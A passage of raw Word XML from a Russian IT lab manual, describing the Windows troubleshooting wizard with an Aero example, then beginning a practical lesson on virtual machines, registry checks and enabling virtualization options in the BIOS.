                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId30" cstate="print"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1859798" cy="1470979"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7D91" w:rsidRPr="00617AC0" w:rsidTr="003C7D91">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4361" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003C7D91" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="004653C4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Рисунок 6 - Вариант описания проблемы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003C7D91" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="004653C4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Рисунок 7 - Проверка с правами администратора</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">По умолчанию, в случае найденных ошибок, мастер устранения неполадок применяет изменения автоматически. Если щелкнуть ссылку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дополнительно</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в первом окне мастера и снять флажок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Автоматически исправлять ошибки</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, то при обнаружении неполадки будет предложен список возможных путей ее устранения, рисунок 8.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2169750" cy="1643938"/>
            <wp:effectExtent l="19050" t="0" r="1950" b="0"/>
            <wp:docPr id="27248" name="Рисунок 26219" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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9" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image208.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2170009" cy="1644134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 8 - Список возможных путей устранения неполадки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В любом случае по окончании диагностического теста выводится отчет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для демонстрации работы компонента Устранения неполадок вручную остановим службу </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер сеансов диспетчера окон рабочего стола</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В целом эффект AERO работает, но исчезла прозрачность окон. Для устранения этой неполадки воспользуемся пакетом устранения неполадок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aero</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Щелчок по ссылке откроет первое окно мастера. Оставим все без изменений и нажмем кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Далее, рисунок 9.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2167845" cy="1632795"/>
            <wp:effectExtent l="19050" t="0" r="3855" b="0"/>
            <wp:docPr id="19" name="Рисунок 26220" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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20" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image209.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2168116" cy="1632999"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 9 - Пакет устранения неполадок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мастер продолжит свою работу и начнет диагностику неполадок, рисунок 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2224002" cy="1684800"/>
            <wp:effectExtent l="19050" t="0" r="4848" b="0"/>
            <wp:docPr id="18" name="Рисунок 26221" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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21" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image210.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2226974" cy="1687052"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Рисунок 10 – Работа пакета</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обычно проверка не занимает много времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Какие проблемы возможны при установке программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Для чего используется компонент Устранение неполадок?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004653C4" w:rsidRPr="00617AC0" w:rsidRDefault="004653C4" w:rsidP="004653C4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Как запустить компонент Устранение неполадок?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc507788516"/>
      <w:bookmarkStart w:id="29" w:name="_Toc507788241"/>
      <w:bookmarkStart w:id="30" w:name="_Toc26278722"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № 3 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidR="00B108F3" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Решение проблем совместимости отраслевого ПО с помощью технологии создания виртуальной машины</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков установки и настройки программного обеспечения. Использование технологии создания виртуальной машины Microsoft Windows Hyper PC для решения проблемы совместимости программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оборудование:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> персональный компьютер, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00DC7A61" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Виртуальная машина это программная и/или аппаратная система, эмулирующая аппаратное обеспечение некоторой платформы (target – целевая, или гостевая платформа) и исполняющая программы для target-платформы на host-платформе (host – хост-платформа, платформа-хозяин)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Виртуальная машина исполняет некоторый машинно-независимый код (например, байт-код, шитый код, p-код) или машинный код реального процессора. Помимо процессора, ВМ может эмулировать работу как отдельных компонентов аппаратного обеспечения, так и целого реального компьютера (включая BIOS, оперативную память, жесткий диск и другие периферийные устройства). В последнем случае в ВМ, как и на реальный компьютер, можно устанавливать операционные системы (например, Windows можно запускать в виртуальной машине под Linux или наоборот). На одном компьютере может функционировать несколько виртуальных машин (это может использоваться для имитации нескольких серверов на одном реальном сервере с целью оптимизации использования ресурсов сервера).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Очень важно!</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> После включения данных опций необходимо сохранить настройки </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BIOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, затем физически отключить питание компьютера и включить снова. Обычная перезагрузка не активирует эти режимы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Проверить наличие записей офисного пакета в реестре.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся скриншоты и описание этапов работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустить оболочку реестра Windows с помощью команды Выполнить в меню пуск. Оболочка носит название RegEdit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удостовериться, что в реестре Windows присутствуют записи офисного пакета.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перед тем, как начинать все действия необходимо включить в BIOS компьютера опции:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>No Execute Page Protection</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intel Virtualization Technology</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Intel VT) </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>процессоров</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intel </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
